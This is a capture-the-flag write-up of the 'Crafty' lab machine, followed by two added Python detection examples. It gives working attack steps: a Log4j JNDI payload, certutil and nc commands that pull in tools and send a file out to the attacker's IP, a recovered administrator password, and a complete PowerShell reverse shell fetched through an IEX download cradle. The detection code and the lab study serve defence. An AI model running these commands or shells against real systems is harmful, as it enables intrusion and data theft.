Crafty
author: sysevil
OS: Windows | Difficulty: Easy | IP: 10.10.11.249
Port Scan
nmap -p- -T4 --min-rate=10000 10.10.11.249 -oG open_ports_full
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 13:34 -03
Nmap scan report for 10.10.11.249 (10.10.11.249)
Host is up (0.13s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
25565/tcp open minecraft
Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds
nmap -sV -sC -A -p 80,25565 -T4 --min-rate=1000 10.10.11.249 -oG open_ports_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 13:36 -03
Nmap scan report for 10.10.11.249 (10.10.11.249)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 136.51 ms 10.10.14.1 (10.10.14.1)
2 136.54 ms 10.10.11.249 (10.10.11.249)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.48 seconds
Add crafty.htb to /etc/hosts:
echo "10.10.11.249 crafty.htb" | sudo tee -a /etc/hosts
Dir Scan
dirsearch -u http://crafty.htb -e jsp,php,asp,aspx,md,yaml,ini,txt,yml,zip,tgz,gz,toml -x 404,500,403
Extensions: jsp, php, asp, aspx, md, yaml, ini, txt, yml, zip, tgz, gz, toml | HTTP method: GET | Threads: 25
Wordlist size: 15708
Output File: /home/parallels/Documents/htb/machines/crafty/reports/http_crafty.htb/_24-02-15_13-47-38.txt
Target: http://crafty.htb/
[13:47:38] Starting:
[13:48:22] 301 - 145B - /css -> http://crafty.htb/css/
[13:48:32] 301 - 145B - /img -> http://crafty.htb/img/
[13:48:32] 301 - 145B - /index.html -> http://crafty.htb/home
[13:48:34] 301 - 144B - /js -> http://crafty.htb/js/
Vhost Fuzz
ffuf -u http://crafty.htb -H "Host: FUZZ.crafty.htb" -w /usr/share/wordlists/amass/subdomains.lst -fw 9
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://crafty.htb
:: Wordlist : FUZZ: /usr/share/wordlists/amass/subdomains.lst
:: Header : Host: FUZZ.crafty.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 9
________________________________________________
:: Progress: [8215/8215] :: Job [1/1] :: 297 req/sec :: Duration: [0:00:27] :: Errors: 0 ::
Tech Stack
- Minecraft 1.16.5
- The only CVE that I found was https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35054 (Ryotak)
- I was looking for something related and found the video from John Hammond about log4j and Minecraft: https://www.youtube.com/watch?v=7qoPDq41xhQ
- The web app has a reference to another subdomain: play.crafty.htb
- Add this subdomain to the /etc/hosts file too.
- Communicate with the Minecraft server using the pyCraft client: https://github.com/ammaraskar/pyCraft
Entry point: Log4j
- Running the tool from https://github.com/kozmer/log4j-shell-poc
python3 poc.py --userip 10.10.14.9 --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://10.10.14.9:1389/a}
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
- Getting the shell
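The `${jndi:ldap://...}` string above reaches Log4j through the server's chat logging, which is also where a defender sees it. The following is an added Python example, not code from the writeup or from the log4j-shell-poc tool, that scans Minecraft server log lines for JNDI lookups after resolving the nested lower/upper/default lookups that hide the token from a plain substring match. The log lines are constructed in the vanilla server's log format and reuse the writeup's attacker IP.

```python
import re

# Log4j 2 lookup forms commonly nested around a jndi lookup to defeat naive
# substring matching.  The pattern set and the sample lines are constructed
# for this example; they are not from the writeup or the PoC tool.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${env:UNSET:-x} and ${::-x} both resolve to the default value "x"
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lower/upper/default lookups until the text stops changing."""
    for _ in range(max_rounds):
        step = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        step = _DEFAULT.sub(lambda m: m.group(1), step)
        if step == text:
            break
        text = step
    return text


def jndi_scheme(line: str):
    """Return the JNDI provider scheme (ldap, rmi, ...) if the line carries a lookup, else None."""
    found = _JNDI.search(normalize_lookups(line))
    return found.group(1).lower() if found else None


def scan_log(lines):
    """Return (line_number, scheme, normalized_line) for every line containing a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = jndi_scheme(line)
        if scheme:
            hits.append((number, scheme, normalize_lookups(line)))
    return hits


# Constructed sample lines: the vanilla server logs chat as "<player> text",
# which is exactly how a lookup string typed in chat reaches Log4j.
SAMPLE_LOG = [
    "[13:52:10] [Server thread/INFO]: steve joined the game",
    "[13:52:31] [Server thread/INFO]: <steve> hello everyone",
    "[13:53:02] [Server thread/INFO]: <steve> ${jndi:ldap://10.10.14.9:1389/a}",
    "[13:53:40] [Server thread/INFO]: <steve> ${${lower:j}ndi:${lower:l}dap://10.10.14.9:1389/a}",
    "[13:54:05] [Server thread/INFO]: <steve> ${${::-j}${::-n}${::-d}${::-i}:rmi://10.10.14.9:1099/a}",
    "[13:54:30] [Server thread/INFO]: <steve> the price is ${::-100} coins",
]

if __name__ == "__main__":
    for number, scheme, text in scan_log(SAMPLE_LOG):
        print(f"line {number}: jndi/{scheme} -> {text}")
```

Lines 3 to 5 are reported (two as ldap, one as rmi), while the harmless `${::-100}` on the last line is normalized to `100` and ignored. The scanner is a detection aid only; the fix for a 1.16.5 server is the one Mojang published for 1.12 to 1.16.5, adding `-Dlog4j2.formatMsgNoLookups=true` to the JVM arguments, or moving to a build that ships a patched Log4j.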
user.txt
root.txt
- First verify that certutil.exe is present, to retrieve and send files to the machine.
- With the Windows binaries from Kali it's easy to send a copy of nc.exe to the machine:
certutil.exe -urlcache -split -f http://10.10.14.9/nc.exe nc.exe
- Retrieve the plugin playercounter-1.0-SNAPSHOT.jar:
- Attacker machine:
nc -lp 9001 > playercounter-1.0-SNAPSHOT.jar
- Victim machine:
C:\Users\svc_minecraft\Desktop\nc.exe 10.10.14.9 9004 < C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar
- Using jadx to get credentials (Jadx: https://github.com/skylot/jadx/releases):
s67u84zKq8IXw
- Using the following PowerShell trick you can create a small reverse shell in PowerShell and execute it as admin:
$SecPass = ConvertTo-SecureString '<pass>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPass)
PS C:\Users\svc_minecraft\Desktop\> Start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/shell.ps1')" -Credential $cred
- shell.ps1
$LHOST = "10.10.14.9"; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
- Run it and get the root flag.
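Everything after the initial shell in this writeup leaves a trace in process-creation telemetry: java.exe spawning cmd.exe, certutil used as a downloader, the IEX download cradle, and Start-Process -Credential producing an Administrator shell from the svc_minecraft session. The following is an added Python example, not part of the writeup, that runs four such rules over constructed records modelled on Windows event 4688 with command-line auditing enabled (Creator Subject as `parent_user`, Target Subject as `user`). The field names, the Java path and the sample events are assumptions; the command lines in the certutil and PowerShell events are the ones this writeup runs.

```python
import re
from pathlib import PureWindowsPath

# Process-creation records modelled on event 4688 with command-line auditing.
# Field names, paths and the sample events are constructed for this example.

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def java_spawns_shell(ev) -> bool:
    # A JNDI payload class executes its command from inside the JVM, so the
    # Minecraft server (java.exe) becomes the parent of a command shell.
    return _name(ev["parent"]) == "java.exe" and _name(ev["image"]) in SHELLS


def certutil_download(ev) -> bool:
    # "certutil -urlcache -f <url>" fetches a file with a signed system binary;
    # hashing or certificate work never combines -urlcache with a URL.
    return (_name(ev["image"]) == "certutil.exe"
            and re.search(r"-urlcache\b.*-f\s+\S+://", ev["cmdline"], re.IGNORECASE) is not None)


def powershell_download_cradle(ev) -> bool:
    # Code fetched over HTTP and handed straight to Invoke-Expression.
    if _name(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    c = ev["cmdline"].lower()
    runs_code = re.search(r"\biex\b|invoke-expression", c) is not None
    fetches = any(s in c for s in ("downloadstring", "downloadfile", "net.webclient"))
    return runs_code and fetches


def credential_switch(ev) -> bool:
    # Start-Process -Credential yields a shell whose account differs from the
    # account that created it: here a service account spawning an Administrator shell.
    return _name(ev["image"]) in SHELLS and ev["user"].lower() != ev["parent_user"].lower()


RULES = {
    "java_spawns_shell": java_spawns_shell,
    "certutil_download": certutil_download,
    "powershell_download_cradle": powershell_download_cradle,
    "credential_switch": credential_switch,
}


def evaluate(ev):
    """Names of the rules that fire for one record, in sorted order."""
    return sorted(name for name, rule in RULES.items() if rule(ev))


def scan(events):
    """Map record index -> fired rules, omitting records that trigger nothing."""
    report = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            report[i] = hits
    return report


JAVA = r"C:\Program Files\Java\bin\java.exe"   # assumed install path
SYS32 = r"C:\Windows\System32"
PS = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [
    {"parent": SYS32 + r"\cmd.exe", "image": JAVA,
     "cmdline": "java -Xmx2G -jar server.jar nogui",
     "user": "svc_minecraft", "parent_user": "svc_minecraft"},        # benign server start
    {"parent": JAVA, "image": SYS32 + r"\cmd.exe",
     "cmdline": "cmd.exe",
     "user": "svc_minecraft", "parent_user": "svc_minecraft"},        # shell from the JVM
    {"parent": SYS32 + r"\cmd.exe", "image": SYS32 + r"\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://10.10.14.9/nc.exe nc.exe",
     "user": "svc_minecraft", "parent_user": "svc_minecraft"},        # downloader use
    {"parent": SYS32 + r"\cmd.exe", "image": SYS32 + r"\certutil.exe",
     "cmdline": "certutil.exe -hashfile server.jar SHA256",
     "user": "svc_minecraft", "parent_user": "svc_minecraft"},        # benign certutil use
    {"parent": PS, "image": PS,
     "cmdline": "powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9/shell.ps1')",
     "user": "Administrator", "parent_user": "svc_minecraft"},        # cradle under new account
]

if __name__ == "__main__":
    for i, hits in scan(EVENTS).items():
        print(f"event {i}: {', '.join(hits)} :: {EVENTS[i]['cmdline']}")
```

Only events 1, 2 and 4 are reported; the server start and the hashing call stay silent. The parent/child account mismatch in the last event is the cheapest signal of the whole chain, since it does not depend on the attacker's choice of download method.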